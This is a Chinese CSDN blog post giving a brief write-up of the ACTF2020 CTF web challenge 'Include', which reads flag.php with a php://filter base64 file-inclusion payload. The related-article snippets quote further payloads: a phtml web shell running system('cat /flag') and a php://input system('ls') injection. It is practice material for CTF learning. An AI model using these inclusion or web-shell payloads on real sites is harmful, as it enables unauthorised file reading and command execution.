[ACTF2020 新生赛] web题-Include

最新推荐文章于 2022-11-20 18:03:01 发布
最新推荐文章于 2022-11-20 18:03:01 发布
阅读量263 收藏 1
点赞数 1
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107187074
版权

复现环境:buuoj.cn
在这里插入图片描述
通过tips知道文件名为flag.php,直接上伪协议读flag.php
php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述解码网站解码得flag
在这里插入图片描述

BROTHERYY
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
[ACTF2020 新生]Include
weixin_53150482的博客
06-12 583
ACTF2020 新生
[ACTF2020 新生] web-Upload
BROTHERYY的博客
07-09 493
复现环境:buuoj.cn 开漆黑一片,注意观察中间,有个灯泡,鼠标移动上去以后会有上传的提示 查看下页面代码,发现有前端js验证 删除以后,发现很多都无法上传,最后phtml能够上传成功,这里可以不用GIF文件头 访问地址,蚁剑连接 也可以直接在phtml里面添加 <script language='php'>system('cat /flag');</script> 直接在访问上传的文件名的时候就读出flag. ...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame{PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame];actf. pickerDelegate = self;actf. possibleStrings = [...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
CTF web安全经典例讲解
10-22
该内容为CTFweb安全经理例讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种型讲解,图文结合,适合新手学习。
[ACTF2020 新生]Include 1【文件包含漏洞】
weixin_38832257的博客
08-17 4326
目简介 目名称:[ACTF2020 新生]Include 1 目平台:BUUCTF 目类型:Web 考察知识点: 文件包含漏洞 解步骤 1.启动并访问靶机,主页只有一个tips连接,我们访问该链接,发现通过file伪协议,打开了flag.php这个文件,说明存在文件包含漏洞。2.既然该文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到flag,猜测flag应该是在flag.php的源代码当中3.我们可以利用php://filter伪协议来查看flag
i春秋-百度杯”CTF 2017 二月场-WEB-include
lovelj的博客
12-31 2485
目名称: include 目内容: 没错!就是文件包含漏洞。 打开界面后显示如下信息,展示phpinfo页面及源码 看目也能猜到是文件包含,关键是如何知道文件的名字呢? 搜索一下allow_url_include看看是否打开: 打开的,可以使用php://input协议,使用post传递参数<?php system("ls");?> 得到: 直接使用php://filter/read=convert.base64-encode/resource=dl.
ctf web 文件包含漏洞(例
weixin_49298265的博客
11-29 3746
文件包含漏洞 php://协议 php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。 一、php://filter 当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行base64编码,阻止其不执行。从而导致任意文件读取。 http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.
DozerCTF2020部分web复现
qq_43756333的博客
06-20 536
前几天打的比web只做出了两道签到,域渗透的暂且搁置,想着就把其他的web复现一下吧。 平台:http://ctf.dozerjit.club:8000/ sqli-labs 0 sql-labs改的,试了很多种姿势都没让id报错,后来还是官方出了hint让尝试url二次编码(喷)才成功 之前在测试中发现select,union之类的都被过滤了,开始以为是盲注,所以写了个脚本出了数据库 import requests words = "Dumb" result = "" for i in r
BUUCTF webInclude
good good study
11-20 940
目提示Include,那考察的应该是文件包含漏洞访问如下点击tips,提示“can you find out the flag?”,观察url为"?file=flag.php"可知为文件包含的形式。
Zer0pts CTF 2020的web后记录+复现环境
蚁景网安学院
05-28 1676
May 2020Zer0pts CTF 2020的web后记录前言打了Zer0pts CTF 2020感觉目不错就总结一下。复现环境地址:https://gitlab.com/z...
CTF-include
qq_61774705的博客
08-16 1911
ctf
[actf2020 新生]include
最新发布
03-16
好的,我理解您的请求是让我用中文回答您的问,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值